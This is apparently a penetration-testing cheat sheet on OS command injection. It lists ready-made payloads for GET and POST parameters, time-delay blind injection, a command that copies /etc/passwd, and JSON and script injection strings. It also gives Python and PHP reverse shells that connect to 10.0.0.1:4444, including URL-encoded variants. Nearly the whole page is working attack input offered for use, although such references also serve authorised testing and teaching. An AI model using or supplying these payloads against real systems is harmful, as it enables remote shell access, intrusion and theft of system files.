Exploit Notes

OS Command Injection

Last modified: 2023-03-03

Remote Code Execution Reverse Shell Web

GET Requests

/api/cmd/whoami
/command/whoami

/?cmd=whoami
/?cmd=;id

/?cmd=ls
/?cmd=ls ..
/?cmd=ls ../
/?cmd=ls /home

POST Requests

We may be able to inject OS commands in POST data by adding pipes.
For example, we can inject system commands.

productId=1&stockId=1|whoami
productId=1&stockId=1|id

Ping

Try pinging to our local machine.

To confirm the result, start tcpdump in our local machine.

# -i: Interface e.g. eth0, tun0
sudo tcpdump -i eth0 icmp

Then execute ping command in POST request.

Below are examples for POST data.

file=example.jpg&filetype=png;ping+-c+1+10.0.0.1

Reverse Shell

file=example.jpg&filetype=png;export RHOST="10.0.0.1";export RPORT=4444;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

Blind Command Injection (Time Delay)

Use "ping" command to check if the website will be loaded with time delay.

name=michael&email=michael@example.com||ping+-c+10+127.0.0.1||&message=hello
email=test@test.com;ping+-c+15+127.0.0.1+#&message=hello

If we find the command can be executed, we can execute the other commands as below.

email=test@test.com;cp+/etc/passwd+./+#&message=hello

JSON Injection

{ "username": "\"; pwd \"" }
{"name":"<script>alert(1)</script>", "email":"victim@vulnerable.com"}
{"name": "admin", "content": "{{template: ./admin.php}}"}

PHP Injection

id=$(php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");')

# URL encode
id=1$(php%20-r%20'$sock=fsockopen(%2210.0.0.1%22,4444);exec(%22/bin/sh%20-i%20%3C&3%20%3E&3%202%3E&3%22);')
id=1$(php%20-r%20%27%24sock%3Dfsockopen%28%2210.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27)
id=1`php%20-r%20%27%24sock%3Dfsockopen%28%2210.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27`

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.